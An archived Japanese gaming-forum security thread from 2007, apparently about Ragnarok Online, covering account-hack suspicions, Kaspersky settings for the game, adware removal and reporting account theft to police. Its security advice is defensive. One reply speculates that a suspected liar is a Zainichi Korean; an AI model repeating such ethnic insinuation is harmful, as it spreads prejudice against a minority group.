(○口○*)さん<>sage<>07/10/06 05:48 ID:0Hruz8ZV0<> アイテムの救済は無い
とりあえず晒しておけ <>
(○口○*)さん<>sage<>07/10/06 05:59 ID:r1zQnnfT0<> 嘘だとした場合、そんなことを周りに言いふらすメリットって何だろう?
「もし踏んでも割りとすぐに救済があるから大丈夫だぜ!」
って言いたいのだろうか…。。
「よそおって利用」というのがイマイチわからないかな。
例えば借りてるアイテム返せない理由みたいなので
垢ハックされたとか言い出す人はちょっといそうだけど。
その場合だと救済あるとは言わないよねぇ。
今までの流れだと警察への報告は必須だし、救済があっても半年くらいかかってると思う。
最近になって癌の方針が変わったってことならわからないけど…。 <>
(○口○*)さん<>sage<>07/10/06 06:12 ID:NvrQ6UEU0<> >>246
平気で嘘書くな <>
(○口○*)さん<>sage<>07/10/06 09:05 ID:OODh9mPm0<> カスペはカスペで誤反応多いからお勧めしない
このスレ、カスペ使い多い割には設定晒されないしなw <>
(○口○*)さん<>sage<>07/10/06 09:56 ID:ZHJcyTza0<> 効能の強い薬に副作用は付き物。ヒューリスティックはそもそも、怪しい動き自体に反応するものだし。
設定云々ではなく、リザルトも開発側に投げられないのなら、おとなしく高いだけの大衆薬でも使っていればよい。 <>
(○口○*)さん<>sage<>07/10/06 10:34 ID:z50hL6AN0<> >>245
今までの報告だと警察の捜査が終了してからじゃないとダメで、大体半年は掛かる模様。
実際調査開始するだけでも2〜3日じゃ済まないみたい。
そいつは完全に嘘を言っている。そういう奴とは縁を切っちゃえ。 <>
(○口○*)さん<>sage<>07/10/06 11:11 ID:L/BwZKJk0<> >>247
普通に借りパクじゃないの?
垢ハックされたことにしてトンズラここうとしたけど
追及されて「癌からアイテム救済をしてもらえそう」と返事ってとこじゃ。
晒しスレ的な小物とでもいうか、そういう奴ならそんな反応すると思う。 <>
(○口○*)さん<>sage<>07/10/06 12:34 ID:+fu7inrY0<> >>251
>実際調査開始するだけでも2〜3日じゃ済まないみたい。
役所で紙っぺら一枚もらうのに、午前中丸々待たされたりするのと同じで、
該当の件に詳しい人間が、専属で対応してくれるわけじゃないからねぇ。
考えりゃ分かりそうなもんだけど。 <>
(○口○*)さん<>sage<>07/10/06 12:57 ID:NvrQ6UEU0<> 2〜3日で救済でなく、
2〜3日後に癌からメールが帰ってきたと読めるわけだけどもさて。 <>
(○口○*)さん<>sage<>07/10/06 13:44 ID:z50hL6AN0<> ああなるほど、他の所からの接続された形跡が見つかりましたってあれかね。
そういや
ttp://www.ragnarokonline.jp/news/information/enquete_0709/result.html
>不正接続への対策
>日本国外からの接続の多くが不正行為に利用されている状況を確認しているため、
>日本国外からのゲームサーバーへの接続を全面禁止いたします。
>対策実施後は、日本国外からの接続を行うことができなくなります。
こんなのやるみたいだけど、
中継鯖建てられたら接続されるとは言え、日本国内にハッキング犯罪目的の中継鯖なんか建てたら
そこにいた奴がタイーホされる可能性ある気がするけどどうなんだろう? <>
(○口○*)さん<>sage<>07/10/06 13:48 ID:L/BwZKJk0<> >>255
本当に今更過ぎる対策だなあ。
炭鉱にドル様がいた時期に提案した覚えがあるぞ。 <>
(○口○*)さん<>sage<>07/10/06 14:33 ID:c86ktdTa0<> >>255
実際に、中国人留学生が中継鯖立てて逮捕されたニュースがあったな。 <>
245<>sage<>07/10/06 15:55 ID:st4rYpca0<> どうも 245です おもっきりねてました
メリットはよくわからんですが あまりに不自然な点が多かったんで・・・
垢ハックから2〜3日程度で癌から救済の通知が帰ってくるなんてありえないし
ハックくらって三日もたってない時ですが
友人にもらったsシューズと♯を自前で拾ってきたエルで過剰精錬して
両方とも+7にしたよ という反応 貧乏人ではありえない
一種の「境地」なのか ともおもえましたが
んでまぁ 確証をえるために協力してもらえないかとここにきたわけで
やっぱ返答までには月単位の時間がかかるってことで
ホラ吹いてるあいつは黒ってことでFAっすかね・・・?
あーあと垢ハックされていた状態のときにしゃべれない?と友人がきいたら
「ぃーや」「垢ハック最高!」とかいってはしっていったそうな
もうこの地点でまわりに垢ハックを印象づけるバカな策にしかみえないという
(´・ω・`) <>
(○口○*)さん<>sage<>07/10/06 16:04 ID:r1zQnnfT0<> 在日なんだろうな、きっとけもう <>
(○口○*)さん<>sage<>07/10/06 16:30 ID:3kjqnZhb0<> そいつ自身がアカハック犯だな <>
245<>sage<>07/10/06 16:35 ID:st4rYpca0<> >>259
>>260
やっぱそうですよねー
まぁ警察のこと聞きつつ時間おいて溜まり場の連中にも話してみようかと
もう確信えたのも同然なんでボロがでるか 準備ととのい次第ぶっちぎりますね
ご協力ありがとうございました&お邪魔いたしました(´・ω・`) <>
(○口○*)さん<>sage<>07/10/06 16:37 ID:+fu7inrY0<> ほとんどが中国語、まれに英語で使ってるケースは見たことあるが、
日本語の、それもスラング的な表現を使いこなすのは、さすがに聞いたことない。 <>
(○口○*)さん<>sage<>07/10/06 16:37 ID:+fu7inrY0<> 英語を <>
(○口○*)さん<>sage<>07/10/06 18:27 ID:z50hL6AN0<> >>258
それはほぼ間違いなく黒 <>
(○口○*)さん<><>07/10/06 18:29 ID:TPhFOqQ30<> Kaspersky Internet Security使いが多いのでROに対する設定を書いてみるか・・・
6.0と7.0共通
基本的にはRO起動時に出てくる(と思う)カスペルスキーのポップアップから全部許可していけばROは動く。
一応登録されている所を挙げていくと、
プロテクション>右の方の信頼ゾーンに追加>除外マスクタブにROのフォルダ追加。
ここの部分の詳細は脅威の種類のチェックの部分はいれない、タスクスキャンは全てのタスクを除外。
信頼ゾーンから信頼するアプリケーション>nProのファイルを追加。
ちなみにこちらの環境だと、C:\Program Files\Gravity\RagnarokOnline\GameGuard\GameMon.desをアプリケーションの所で追加。
"ルールの詳細"部分はネットワークを含めた全てをスキャンしないようにする。
ファイアウォール有効の場合はさらに
プロテクションのツリー>アンチハッカー>ファイアウォール有効にする、の設定
>アプリケーションごとにルールを分類するにチェック>追加で
Ragnarok.exe Ragexe.exe GameMon.des GAMEGUARD.DES
の4つを追加、ルールの部分はTCP、UDPの送受信全部を許可
他に何か追加したほうがいいて人はこれに付け足して書き込みしてください。
Kaspersky Internet Securityを使ってる人、これから使う人の為にもお願い(´・ω・`)b <>
(○口○*)さん<>sage<>07/10/06 18:31 ID:3kjqnZhb0<> そういえばカスペ7.0にアップデートするの忘れてた <>
(○口○*)さん<>sage<>07/10/07 13:17 ID:owWHEnAwO<> ちょっと時間が空いていたので、暇つぶしににお気に入り登録してあるページを片っ端からaguseで調べたら何故かWikiのメインページの登録国が韓国からになってたんだけど…これって元々からでしたっけ?
いや、くだらないと思うかもしれないけど一応気になったので… <>
(○口○*)さん<>sage<>07/10/07 13:25 ID:Vy2yiKqJ0<> ウィキペディアの事か?Wikiと略すと別物になるから注意。
見れなくなった→PG2で弾いてねぇだろなってのは何度か有ったぞ。 <>
(○口○*)さん<>sage<>07/10/07 13:26 ID:PHVa7dAa0<> >>267
もともと。
wikipedia見ようとするとPG反応する。
韓国yahooの鯖使ってるんだっけかな? <>
(○口○*)さん<>sage<>07/10/07 13:37 ID:owWHEnAwO<> >>268
失礼しました、ウィキペディアのことです。
ふむ、ということは一応は問題ないのかもしれませんね。
だからといって本当に悪意のある改竄がされてたら洒落にもなりませんが…
>>269
元々からでしたか、PGに反応するのは仕方がないにしても迂闊にクリックするのは気が引けますね(汗
疑問も解けましたし、このような質問にお答え頂ありがとうございました。 <>
(○口○*)さん<>sage<>07/10/07 13:59 ID:WY7up/0c0<> そういや、「RO本国のHP弾いちゃうんだけど大丈夫なのか」ってのもたまにあるなぁ。 <>
(○口○*)さん<>sage<>07/10/07 14:16 ID:Zrc089Ln0<> 203.212.189.253
203.212.189.254
がWikipediaだの。
たまに鯖メンテだか入れ替えだかの時にアメリカの鯖に一時的に転送される事もある。 <>
(○口○*)さん<>sage<>07/10/07 16:51 ID:+3m2r9TgO<> Norton360使っている人に質問ですが急にウイルス対策が無効になり有効にしようとAuto-Protectの設定を変えてみましたがなぜか適用されません
同じような現象になった人いますか? <>
(○口○*)さん<>sage<>07/10/07 16:52 ID:e02Prwu70<> 漏れは2006で何度か同じような現象になったな
再起動したら直った <>
(○口○*)さん<>sage<>07/10/07 16:58 ID:+3m2r9TgO<> 書き込みありがとうございます
再起動しているのですが変わらずスキャンしようにもエラーがでてしまいます
これってウイルスでしょうか? <>
(○口○*)さん<>sage<>07/10/07 16:58 ID:CBtcKigN0<> Wikipediaの鯖は、あちら側の内部認識では米国に置かれていることになっているな。
ここの記述でも、韓国・ソウルクラスタから、米国・フロリダクラスタに移動と書かれている。
ttp://ja.wikipedia.org/wiki/Wikipedia:%E9%81%8E%E5%8E%BB%E3%83%AD%E3%82%B0/%E4%BA%95%E6%88%B8%E7%AB%AF_%28%E5%91%8A%E7%9F%A5%29/2006%E5%B9%B49%E6%9C%88#.E3.82.A6.E3.82.A3.E3.82.AD.E3.83.9A.E3.83.87.E3.82.A3.E3.82.A2.E6.97.A5.E6.9C.AC.E8.AA.9E.E7.89.88.E3.81.AE.E3.82.B5.E3.83.BC.E3.83.90.E7.A7.BB.E5.8B.95.E3.81.8C.E8.A1.8C.E3.82.8F.E3.82.8C.E3.81.BE.E3.81.99
実際のところ、物理的にはどうなっているのだろう。ゲートウェイかproxyでも韓国側クラスタに残してあるのだろうか。
法制度の面でも引っかかる要素がある様だし。
ttp://ja.wikipedia.org/wiki/%E5%88%A9%E7%94%A8%E8%80%85:Tomos/%E5%90%84%E7%A8%AE%E7%94%BB%E5%83%8F%E3%81%AE%E6%8E%B2%E8%BC%89%E3%81%AB%E3%81%A4%E3%81%84%E3%81%A6#.E3.82.B3.E3.83.A2.E3.83.B3.E3.82.BA.E3.81.B8.E3.81.AE.E3.82.A2.E3.83.83.E3.83.97.E3.83.AD.E3.83.BC.E3.83.89.E3.81.AB.E3.81.BE.E3.81.A4.E3.82.8F.E3.82.8B.E5.95.8F.E9.A1.8C
それとは別件で、Wikipediaのユーザーにもアカウントハックの事例。
これは私怨絡みのようだが。
ttp://ja.wikipedia.org/wiki/Wikipedia:%E4%BA%95%E6%88%B8%E7%AB%AF/subj/%E3%83%8F%E3%83%83%E3%82%AD%E3%83%B3%E3%82%B0%E3%81%A8%E3%82%A2%E3%82%AB%E3%82%A6%E3%83%B3%E3%83%88%E4%B9%97%E3%81%A3%E5%8F%96%E3%82%8A%E3%81%B8%E3%81%AE%E5%AF%BE%E5%87%A6
ttp://ja.wikipedia.org/wiki/Wikipedia:%E9%80%B2%E8%A1%8C%E4%B8%AD%E3%81%AE%E8%8D%92%E3%82%89%E3%81%97%E8%A1%8C%E7%82%BA/%E9%95%B7%E6%9C%9F/%E5%AE%AE%E6%A3%AE%E6%B4%8B <>
(○口○*)さん<>sage<>07/10/07 17:11 ID:e02Prwu70<> >>275
2,3回再起動してだめだと、漏れじゃお手上げだ\(^o^)/
ウイルス心配ならカスペのオンラインスキャンをしてみるといい
ちなみに2chのセキュ板の360のスレはこれね
ttp://pc11.2ch.net/test/read.cgi/sec/1186345122/ <>
(○口○*)さん<>sage<>07/10/07 17:13 ID:ttPFqdOT0<> >>275
ファイルがぶっ壊れたんじゃないか?
アンインスートルして再度インストールすることを勧めてみる <>
(○口○*)さん<>sage<>07/10/07 17:32 ID:+3m2r9TgO<> 再インストールしてみます
ありがとうございました <>
(○口○*)さん<><>07/10/08 08:50 ID:j6lYLdFC0<> >>265
それに合わせて設定したら少し軽くなりました
ありがじゅっぴきありがとう <>
(○口○*)さん<>sage<>07/10/08 13:08 ID:o92OnYVZ0<> ■「ウイルスの王様」が中国で猛威、対策ソフトを無効に
http://pc.nikkeibp.co.jp/article/NEWS/20071001/283418/
俺様はカスペだから安心と高をくくっていたが超強力なウィルスが誕生していたようだ(ガクブル <>
(○口○*)さん<><>07/10/08 13:21 ID:a94403As0<> >>281
http://ratan.dyndns.info/avast4/patio/patio.cgi?mode=view&no=373
ここでも話題になってる
カスペル神話の崩壊('A`)
掲示板等に貼り付けられる怪しいURLはむやみに踏むなてことだな・・・
俺の張ったURLが怖ければチェックサイトでチェックして踏んでくれ
aguse.net
http://www.aguse.net/
ソースチェッカーオンライン
http://so.7walker.net/guide.php <>
(○口○*)さん<>sage<>07/10/08 13:50 ID:etRCqHoO0<> 神話に突っ込み禁止 <>
(○口○*)さん<>sage<>07/10/08 14:00 ID:HcmU+3Cl0<> とりあえず、レジストリエディタに躊躇しない人向けの対策。
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options - 右クリック - アクセス許可
セキュリティ -
CREATOR OWNER - 削除
これで、ネット巡回時はUsers(制限ユーザー)でログインするようにし、必要な時だけadmin権限で入り直せば、exploitで脆弱性を
攻撃されるケース以外には耐えられるような希ガス。 <>
(○口○*)さん<>sage<>07/10/08 14:08 ID:azg90dG60<> アンチウィルスソフトを停止させるのは定番の動作だから
別に神話崩壊とも何とも思わんが。
むしろこの手の話題で焦るのって、アンチウィルスソフトを
過信しすぎじゃないか? <>
(○口○*)さん<>sage<>07/10/08 14:15 ID:xxaFxzKY0<> 対策ソフトを無効にするなんて昔からあるじゃろ。 <>
(○口○*)さん<>sage<>07/10/08 14:36 ID:7PUrQV6J0<> だな。
古典的だけど、亜種がいっぱい有ってすり抜けられる可能性あるから注意しようなってだけだろ。 <>
(○口○*)さん<>sage<>07/10/08 15:25 ID:hlz5iMDO0<> この世界には、注意力散漫な似非管理者、セルフ管理者が多すぎる。 <>
(○口○*)さん<>sage<>07/10/08 17:00 ID:7PUrQV6J0<> ROセキュリティWiki に、検体提出先をまとめました。
http://rosafe.rowiki.jp/
セキュスレ初代の797さんの投稿がベースになっています。
VirusTotal等に出てくるセキュリティベンダーの情報を、ある程度追加してみました。 <>
(○口○*)さん<>sage<>07/10/08 19:10 ID:zesROeVS0<> >>285
対策ソフト入れておけば安心と思ってる奴らなんて周りにごろごろしてるじゃろ。
どんなに古典的でも無知な奴の方が大多数なんだから警告は重要。
それにそういう連中は大抵のことは調べようとさえしないから派手なタイトルで目をひく必要がある。 <>
(○口○*)さん<>sage<>07/10/10 01:27 ID:CMy1B4P80<> は〜いWindowsUpdate来ましたよ〜。
IE累積パッチは必ず入れておきましょう。 <>
(○口○*)さん<><>07/10/10 05:04 ID:ed+T6uxu0<> 月例WUage 緊急(4) 重要(2)
ttp://www.microsoft.com/japan/technet/security/bulletin/ms07-oct.mspx <>
(○口○*)さん<><>07/10/10 13:42 ID:gd0gjtLZ0<> ,;'" ;, ,,
,;'" ;, ,,;''" ,;i
,,;;''"" ''"""゙゙,,;'' ,;;i
,,;;'" ..,;;;' ハニャーン…
,;' O ゙;, ハニャーン
;, "" ○ ;;
゙;, `ー--、__ '"" * ,;'
ゴロゴロ ゙゙:::::... ,,;'
゙::::::....... ,,,;;;:::'" ゙;,、
;;'゙;;,,. ; ,;' ゙;;ヽ
;;' ::゙;;::::::.... ;;' ;;;;:_,,r'' )-、
;;' :::,;;''"つ;;;;' ,;;: ̄ ' ; ,)
/;;", , ::,;;'ノ´;;;:;;", , ,;;' /
/ ゙``/´;;;;;::::::: ゙````´ヽ、.. ,,/,;'
/ / ;;::;;;::,,. ;'' ..;;;;;;/ |,,;'"゙;,
/ / ,,;;" ,,;;; / | ゙;, ゙;,
/ / ;,、、、 .,,;;'' ;; / | ゙;, ゙;;..,,
/ / ゙`=-'" ;,、、、 .,/ | ゙;;,, ゙゙゙;;..,,
/ ゙`=-'/ | ゙゙゙;;..,,,,,,;;' <>
(○口○*)さん<><>07/10/10 17:49 ID:Ja7KpN3O0<> ∧_∧ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
∧( ´∀`)< WindowsUpdateあげ
( ⊂ ⊃ \_________
( つ ノ ノ
|(__)_)
(__)_) <>
(○口○*)さん<>sage<>07/10/10 19:53 ID:foNV69uF0<> 【速報】バッファロー製USBメモリの一部にネトゲの垢パスを抜くウイルスが混入
http://live25.2ch.net/test/read.cgi/mmonews/1191998153/
困るね <>
(○口○*)さん<>sage<>07/10/11 13:01 ID:JOU22gnm0<> ■Kasperskyの無料マルウェア検出ツールに危険度「高」の脆弱性
http://www.itmedia.co.jp/news/articles/0710/11/news023.html
ヾヽ'::::::::::::::::::::::::::'', / あ .あ ま ヽ
ヾゝ:::::::::::::::::::::::::::::{ | あ .わ だ |
ヽ::r----―‐;:::::| | わ あ |
ィ:f_、 、_,..,ヽrリ .| あ わ |
L|` "' ' " ´bノ | わ わ |
', 、,.. ,イ ヽ わ わ /
_ト, ‐;:- / トr-、_ \ て /
, __. ィイ´ |:|: ヽ-- '.: 〃 `i,r-- 、_  ̄ ̄
〃/ '" !:! |:| :、 . .: 〃 i // ` ヽヾ
/ / |:| ヾ,、` ´// ヽ !:! '、`
! |:| // ヾ==' ' i i' |:| ',
| ...:// l / __ , |:|::.. |
とニとヾ_-‐' ∨ i l ' l |<; 天 ヾ,-、_: : : .ヽ <>
(○口○*)さん<>sage<>07/10/11 13:03 ID:8ghMF8ap0<> >>295
ソースネクストで検知できるくらいだ、大した物ではなさそう。
>>296
既に修正済みだし、ActiveXコントロールなら勝手に更新されるだろ。
Flashみたいに。 <>
(○口○*)さん<>sage<>07/10/11 19:20 ID:OKBQoj7x0<> カスペももう駄目だわw <>
(○口○*)さん<>sage<>07/10/11 19:31 ID:8ghMF8ap0<> セキュ板からアレな奴が来てるな。 <>
(○口○*)さん<>sage<>07/10/11 19:34 ID:S9VrEOkc0<> ここはセキュスレだが、セキュ板ってなに? <>
(○口○*)さん<>sage<>07/10/11 19:37 ID:8ghMF8ap0<> 2ちゃんねる セキュリティ板。
各セキュリティソフトの信者同士が罵り合い、
最近はNOD厨やノートン厨によるカスペ叩きが顕著。 <>
(○口○*)さん<><>07/10/11 21:46 ID:ef/3Mcty0<> あそこはIDで無いからな <>
(○口○*)さん<>age<>07/10/12 05:13 ID:V6kQVJ7B0<> >>297
外国のはもう直してあったみたいだが日本語版は今更新中みたいだね <>
(○口○*)さん<>sage<>07/10/13 06:10 ID:75usxPLx0<> 日本語版カスペオンラインアップデートきたよ
最初の一個のPCは一度アンインスコしないと更新されなかったがもう一個は普通に上書き更新されたわ
そんでもってなんかみつかったけど、コレ、スパイウェアかな?
カスペさんが見つけたのにデータベースに載ってないけど
not-a-virus:AdTool.Win32.WhenU.a <>
(○口○*)さん<>sage<>07/10/13 06:52 ID:uf/s0LFK0<> 名前からして、それはアドウェア。広告表示する奴。 <>
(○口○*)さん<>sage<>07/10/13 07:20 ID:75usxPLx0<> なんてこった
カスペ体験版落として完全スキャンしたら脅威は発見できませんでしたとか・・・\(^o^)/
でもウェブスキャンだと出るし、感染してたファイル削除してみたら他の場所に移ってた。もうなにがなんやらわからないよぱぱん・・・ <>
(○口○*)さん<>sage<>07/10/13 07:45 ID:uf/s0LFK0<> >>306
その検出が、どこのなんてファイルなのか位書けよ。それじゃ愚痴にしかならん。
多分、検出されたのは、IEのキャッシュで毎回生成されてるんじゃないかと予想。
アドウェアの検出なら、Ad-AwareSEとか使ってみたらどうだい?
IT用語辞典【アドウェア】
http://e-words.jp/w/E382A2E38389E382A6E382A7E382A2.html <>
(○口○*)さん<>sage<>07/10/13 15:16 ID:uf/s0LFK0<> ttp://gemma.mmobbs.com/test/read.cgi/ragnarok/1180778750/872
噴いたw <>
(○口○*)さん<>sage<>07/10/13 16:11 ID:ubpE+7js0<> >>304
WhenUで調べると色々出てくる。
daemon toolsやBSPlayerあたりをインストールする時に、何も考えずに承諾すると一緒にインストールされるアドウェアの模様。
心当たりがあるなら、そういったアプリを一旦アンインストールし、表示内容に留意しながら再インストール。 <>
(○口○*)さん<>sage<>07/10/13 20:55 ID:uXT6PdzS0<> http://gemma.mmobbs.com/test/read.cgi/ragnarok/1185352481/740-
http://gemma.mmobbs.com/test/read.cgi/ragnarok/1185352481/720
向こうで694がクリーンインストールを頑なに拒む理由がわかったのだけど
友人のウイルスが仕込んだか判らんのに
スレの720の解決に活路を見出そうとする相談主と
その間そのPCで何も出来なくなるだろう友人の呑気さが危なっかしく見えたという愚痴。
友人もOSも再インストしたくない理由があるのだろうけど…
Ad-AwareSEはアホの子の俺でも使いやすいのでお勧め。
IEのキャッシュで発見されるならキャッシュと
いちおう各所に点在するテンポラリのファイルを全て消して検索かけるとか。
not-a-virus:AdTool.Win32.WhenU.aでぐぐったら
http://pc11.2ch.net/test/read.cgi/software/1136229808/513-612
の586でひっかかった。
>>307の言うような毎回生成しているものなのかもしれない? <>
(○口○*)さん<>sage<>07/10/13 20:58 ID:uXT6PdzS0<> ああ…309できっちりフォローされてた…ちゃんと読め俺。 <>
(○口○*)さん<>sage<>07/10/14 01:44 ID:9XA4BErP0<> まー。
そのうち変なの踏んで、後悔するんでしょう。
自己責任というか、自業自得というか、
まぁ本人が納得しているんでいいんじゃないかな。
我々が助言できることはもうないでしょう。 <>
(○口○*)さん<>sage<>07/10/14 13:26 ID:/9a9Yexg0<> 304書き込んだものですが、やっとこさ、たぶん解決したので報告だけ。
長文で・・・
古いデーモンを更新したら勝手に発動したのかデーモンのエグゼファイルを検出していました。
デーモンを削除したところシステムボリュームインフォメーションのエグゼファイルに転移しました。
助言を下さった方々に言われたとおり、Ad-AwareSEで検索し、
最新版の2007の解説があったのでそちらを使い検索・セーフ検索してみましたが完全スキャンで検出されませんでした
どこに隠れているファイルかわからなかったので途方にくれていたのですが、とりあえずcドライブを検索してみたら感染ファイルが一瞬ででてきましたorz
また転移されても困るのと、削除はしちゃって大丈夫なファイルか分からないところも微妙だったので
とりあえずアヴェスト先生のチェストへ移動させました。
ていうかアヴェスト先生でフル検索しても一度も発見すらしてくれなかったってのに
検索で出てきた当のファイルを右クリ単品検査したらアドウェアが発見されました。対処しましょうってひどいオチ
ないとは思うけどもしも同じような事があった人のために書き記しておきますorz
でもなんで、ほんとになーんで隠しファイルでもなんでもないデーモンのエグゼファイルに感染していたときにもウィルス対策ソフトやスパイボットなどのフルスキャンで発見されなかったんだろう・・・?
カスペWEBのマイコンピュータスキャンで発見されるのにカスペ体験版フルスキャンで発見されないっていうのも・・・謎でした・・・ <>
(○口○*)さん<>sage<>07/10/14 13:28 ID:/9a9Yexg0<> 大切な一文が抜けてました
チェストに隔離して、カスペオンラインスキャンしても発見されなくなり、やっと平和が我がメインPCに戻り
超絶チキンなわたくしめはやっとこさROにinできます
皆さんご迷惑をおかけしましたorz <>
(○口○*)さん<>sage<>07/10/14 14:01 ID:7yTe9enF0<> >>313-314
だから、アドウェア入りのソフトを「起動している時だけ」検出されるんだろ。参考までにコピペ。
http://daemontools.gusoku.net/
>これからデーモンツールをダウンロードされる方へ
>Daemon Tools ver4.0以降より、デーモンサーチのツールバーにアドウェア(スパイウェア)が
>同梱されているそうです。インストール時に「DAEMON Tools Search Bar」のチェックを外せば
>大丈夫らしいのですが、当サイトでは念のためにver3.47のインストール・ダウンロードについて
>解説しています。
あと、Ad-Awareの2007はあんまり評判良くないのでSEの方がいいかもしれない。(←これは個人的見解) <>
(○口○*)さん<>sage<>07/10/14 14:56 ID:/9a9Yexg0<> そこのサイトさんも再導入するときに参考にしました
最も注意すべき点は古いデーモンツールを使用していてアップデートを促され応じてしまうと有無を言わずにもれなく付いてくる事ですかねぇ
あとアドウェア入りの起動しているときだけ〜ってことはないと思いますけど・・・
ほぼ同じ条件で無償版カスペやアヴェストで検索したときにも見つかりませんでしたし <>
(○口○*)さん<><>07/10/15 10:45 ID:RTk/LxQW0<> 別所でここに誘導されたのでこちらに書かせてもらいます
徳島県警生活環境課と徳島北署は25日、会員制のオンラインゲームに他人のIDとパスワードを使って不正にアクセスしたとして、
埼玉県北本市の土木作業員の少年(18)を不正アクセス禁止法違反容疑で逮捕した。 調べでは、少年は4月30日午後2時ごろ、
自宅のパソコンからインターネットに接続し、チャットを通じて入手した北島町の女性(21)のIDとパスワードを無断で使用し
ゲームにアクセスした疑い。
こういうのって警察どうやって調べてるんでしょうか?もし通報しなければ警察とか一切動きませんよね?
てことはこの被害者の人たちは全員被害届だしたってことなんでしょうか? <>
(○口○*)さん<>sage<>07/10/15 11:51 ID:ZR6L6V390<> >317
被害届けを出してる人は居る模様。
出さないと警察は動かないしね。
ROでもこのスレや垢ハクスレの過去ログを見れば、被害届けを出してる人は何人かいる。
被害届けを出さなければ解決しないし、ゲームだから、と泣き寝入りは禁物。
不正アクセスという立派な犯罪に巻き込まれてるわけだから、被害に遭った場合は
警察に届ける事を推奨。
ただ警察も動きが鈍かったりするし、犯人が国外だと手の出しようがない場合もある。
でも何もしないよりは届けたほうがいい。 <>
(○口○*)さん<><>07/10/15 11:57 ID:RTk/LxQW0<> >318
回答ありがとうございます。 <>
(○口○*)さん<>sage<>07/10/15 12:00 ID:q3ZpiDO70<> >>317
警察もエスパーじゃないから、被害者が知らせてくれないと分からない
知らせてくれた内容で調べたら、今回はハックした人が分かって逮捕に持ち込めた
但し分からないこともあるし時間かかかることもある
担当者によっては、ゲームなんてと一顧だにされないこともある
でも泣き寝入りしたくなければ、損失取り戻すために自分が動くしかないんじゃない? <>
(○口○*)さん<>sage<>07/10/15 12:12 ID:s1NNqDNL0<> >>317
全員が被害届けを出す必要はない。
なぜなら捜査の過程で芋づる式に発覚することもあるから。
でもそれって他人が被害届けだしてなければだめぽなので
結局は>>318や>>320が言うように届け出る必要がある。 <>
(○口○*)さん<>sage<>07/10/15 16:14 ID:ZR6L6V390<> >317
垢ハクスレから移動
>最後に課金してからだと3〜4ヶ月たってるんで・・・
「数ヶ月ぶりに復帰しようとしたら盗まれていて、発覚したのはつい最近」
という事かな。
まずPC面に関しては、ハクられたルートが不明なら、PCにトロイが今も
潜んでる恐れがあるので、スキャンして駆除。
その時にトロイが見つかったら、そのスキャン結果のログは保存した方が
いいと思われる。
そして不正アクセスの被害については、癌と警察と両方に働きかける。
癌は警察に言ってくれとテンプレ回答、警察は癌から動くように言ってくれ、と
たらい回し状態になりがち。
でも癌の方には「警察に被害届けを出したので、所轄から連絡が行くと思う」と
書いておけば、多少は対応が変わると思われ。
あと癌から装備一式の補填を受けた人も居る模様。
まとめサイトの過去ログには、警察に被害届けを出した人のレポも載ってるので
一読した方が良いかと。
▼全国警察サイバー犯罪相談窓口等一覧
ttp://www.npa.go.jp/cyber/soudan.htm <>
(○口○*)さん<>sage<>07/10/15 16:42 ID:9jtcmK100<> 現在進行形で垢ハク犯と格闘中な知人のブログによると、まず癌に報告した後
不正利用の形跡が確認されました、なテンプレが届くまで何度も請求するのが吉。
そのテンプレが届くまでは投稿画面自体も追加発言が可能な状態が続くらしいから
それを利用するといいらしいよ。
警察への相談(法律上被害者は癌なので、厳密には被害届けでは無い)に行く
際はそのやり取り全文と公式内プレイガイドに挙がってる垢ハク対策の流れを
印刷したのを資料として持参すると話が伝わり易いとか。 <>
(○口○*)さん<>sage<>07/10/15 17:12 ID:U9thRD2c0<> カスペのオンラインスキャンを先ほどしたところ検知されたウイルス、感染したオブジェクト
疑わしいオブジェクトはすべて0だったのですが下のレポートの所に
感染オブジェクト名 / ウイルス名 / 前回の処理、とあって下に大量にあるのですが
これはなんなんでしょうか <>
(○口○*)さん<>sage<>07/10/15 17:27 ID:kNZojNpk0<> そういやカスペのメンテナンス後から、
ブロックされていますと出てチェックできないファイルが増えたな。 <>
(○口○*)さん<>sage<>07/10/16 12:57 ID:yYG6wHfM0<> チャットを通じてパスを入手って…
それ本人が教えたってことだよね?
その場合不正アクセスを幇助したってことで
そのパスを教えた女性も共犯になるはず
被害者は運営会社ってことで <>
(○口○*)さん<>sage<>07/10/16 15:54 ID:OIiIIAdI0<> >何人も、アクセス制御機能に係る他人の識別符号を、
中略
>利用権者以外の者に提供してはならない。
中略
>当該利用権者の承諾を得てする場合は、この限りでない。
ならないんじゃね。
会社で出張してる同僚のメールをチェックするとか、
業者がシステム拡張のためにテストするとか、
そういった運用ができるように管理者の許可だけでなく
IDを発行された人の許可でもアクセスはできるようになってる。
つまり本人は他人にアクセスを促してもよい。 <>
(○口○*)さん<>sage<>07/10/16 17:16 ID:yFRBFK1Q0<> >>326,327
それってセキュリティのセの字もないな。
あと他人にID使わせるのは普通に規約違反。 <>
(○口○*)さん<>sage<>07/10/16 17:39 ID:661yIRir0<> ROではよくあること
Gvギルドのギルマスの8割はアカ共有してると思う <>
(○口○*)さん<>sage<>07/10/16 17:46 ID:pY+DKRNX0<> >>328
エスパー乙 <>
(○口○*)さん<><>07/10/19 00:47 ID:GcHRhq+G0<> 先ほど、カスペルのオンラインスキャンにてウイルスが発見されました。
not-a-virus:AdTool.Win32.WhenU.a
これです。
発見された場所は、
D:\System Volume Information\_restore{AA097E10-2C5A-4E0A-BC5C-6DC437FA6187}\RP130\A0033482.exe/data0011
です。
>>304のレスと同じのでした。そこでAd-Aware SE Personalでフルスキャンしても感知しませんでした。avst!でもスルーされました。
システム復元はずいぶん前に切っています。後、ノートンのオンラインも使ったのですがこちらは見つかりませんでした。
カスペルの体験版を使った方が良いのかもしれませんが以前に使ってしまったので正規版しかできません。
どうやれば駆除できますか? <>
(○口○*)さん<>sage<>07/10/19 00:58 ID:KGZZGMzW0<> うん、スレ内検索するなりすこ〜しだけ上の方を読み返すだけで良いんだ、してくれ <>
(○口○*)さん<>sage<>07/10/19 01:17 ID:puL45nSd0<> うん。>>313-316辺りで解決策出てるしね。
>>304と同じだと思ったら、その解決策が出たかどうか位は探すべきだと思うんだ。 <>
(○口○*)さん<><>07/10/19 02:46 ID:GcHRhq+G0<> レスありがとうございます。
レスを読み私なりに解釈してして作業を結果を書きます。
WhenUで検索したら、デーモンのフォルダがでました。その中身は空でした。念のためavst!でやりましたがダメでした。
そこで、デーモンツールを消し再度スキャンをしたのですが同じ名前がウイルス欄にあがりました。
D:\System Volume Information
の中身を全て消すにはどうすれば良いのでしょうか?後、これを消すにはどうすれば良いのでしょうか?
